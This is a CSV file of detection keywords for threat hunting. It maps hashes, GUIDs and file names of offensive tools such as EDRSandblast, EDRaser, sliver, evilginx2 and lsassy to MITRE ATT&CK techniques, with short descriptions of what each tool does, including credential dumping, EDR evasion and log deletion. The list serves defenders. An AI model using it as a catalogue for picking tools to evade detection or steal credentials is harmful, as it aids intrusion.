"*ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c*",".{0,1000}ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54*",".{0,1000}ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7*",".{0,1000}edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887*",".{0,1000}edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70*",".{0,1000}eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35*",".{0,1000}edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*edge_wscript_wsh_injection*",".{0,1000}edge_wscript_wsh_injection.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*edge1.parrot.run*",".{0,1000}edge1\.parrot\.run.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*EditC2Dialog.*",".{0,1000}EditC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*Edit-FileWMI*",".{0,1000}Edit\-FileWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*EDR Detector by trickster0*",".{0,1000}EDR\sDetector\sby\strickster0.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detection.exe*",".{0,1000}EDR_Detection\.exe.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detector.7z*",".{0,1000}EDR_Detector\.7z.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*EDR_Detector-master*",".{0,1000}EDR_Detector\-master.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*edraser.py -*",".{0,1000}edraser\.py\s\-.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*EDRaser-main*",".{0,1000}EDRaser\-main.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*EDRSandblast.c*",".{0,1000}EDRSandblast\.c.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandBlast.h*",".{0,1000}EDRSandBlast\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result 
without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*edrsandblast.py*",".{0,1000}edrsandblast\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast.vcxproj*",".{0,1000}EDRSandblast\.vcxproj.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" 
"*EDRSandblast_API.c*",".{0,1000}EDRSandblast_API\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_API.exe*",".{0,1000}EDRSandblast_API\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_API.h*",".{0,1000}EDRSandblast_API\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_CLI*",".{0,1000}EDRSandblast_CLI.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump*",".{0,1000}EDRSandblast_LsassDump.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast_LsassDump.c*",".{0,1000}EDRSandblast_LsassDump\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_LsassDump.exe*",".{0,1000}EDRSandblast_LsassDump\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*EDRSandblast_StaticLibrary*",".{0,1000}EDRSandblast_StaticLibrary.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSandblast-GodFault*",".{0,1000}EDRSandblast\-GodFault.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" 
"*EDRSandblast-master*",".{0,1000}EDRSandblast\-master.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*EDRSilencer.exe*",".{0,1000}EDRSilencer\.exe.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3*",".{0,1000}ee0ef3b713324cc7b0d6406c194c4e563fdcbcdea330300844e30603969cbde3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640*",".{0,1000}ee29b50f82ac78854af1e014fe9986a9699f98683ca798092f6b51282c08d640.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05*",".{0,1000}ee2b096fee2d9337ce5b2e1506ffdae090833eefc634b73f22046679de392f05.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*EE64B207-D973-489B-84A8-B718B93E039B*",".{0,1000}EE64B207\-D973\-489B\-84A8\-B718B93E039B.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - 
T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b*",".{0,1000}ee6603f8abadc1b575b6c696caf487da5421ad772cf65b38f49c35630d34f09b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01*",".{0,1000}ee9f3bc75013e6741dde950888676f9c20134ed7a7607bd069da81727be1fa01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3*",".{0,1000}eea432f6f16df3514a6310b593ea8676d2330310d9181cda1e7c278ad53758b3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427*",".{0,1000}eeb9847bbb8fdb98a1454e6dcde4e4e685bf549e0ab42fab823ed5abf83de427.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*EEC35BCF-E990-4260-828D-2B4F9AC97269*",".{0,1000}EEC35BCF\-E990\-4260\-828D\-2B4F9AC97269.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*EEC48565-5B42-491A-8BBB-16AC0C40C367*",".{0,1000}EEC48565\-5B42\-491A\-8BBB\-16AC0C40C367.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" 
"*eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95*",".{0,1000}eec5232b43748fc0c8a86e2b3e7b921e88b9aa0275a0ad3b4f719f8e468b1f95.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*eeriedusk/nysm*",".{0,1000}eeriedusk\/nysm.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863*",".{0,1000}ef0602ea7c5cfe523cd58fbfb20f835a908c5d3873fcb14510a042d13de53863.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*EF143476-E53D-4C39-8DBB-A6AC7883236C*",".{0,1000}EF143476\-E53D\-4C39\-8DBB\-A6AC7883236C.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" 
"*ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583*",".{0,1000}ef377470d920bdd421679da6fa7dd8a4cd7445b22db2829419dd62be97131583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371*",".{0,1000}ef5bf46dc35dcb1881a81107214ba85cafd4b3eb76e8a68b32005e9dd44d1371.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e*",".{0,1000}ef62b7afc565b06ed3c0a764f927ce9ccdc376c569c74c4c8ff1c977d89ef15e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff*",".{0,1000}ef881142422dd10c7ad27424ce2407312b3886c5ee940a4be17153caed6ccaff.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896*",".{0,1000}ef9bce2a5c2f623419be05c9090187cba082a208f7685bd93c349fe71cbad896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924*",".{0,1000}ef9c57ffe31d8ceeb51daeac466dc8835807ab7d9fd3ff05ada8ce9b4836d924.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" 
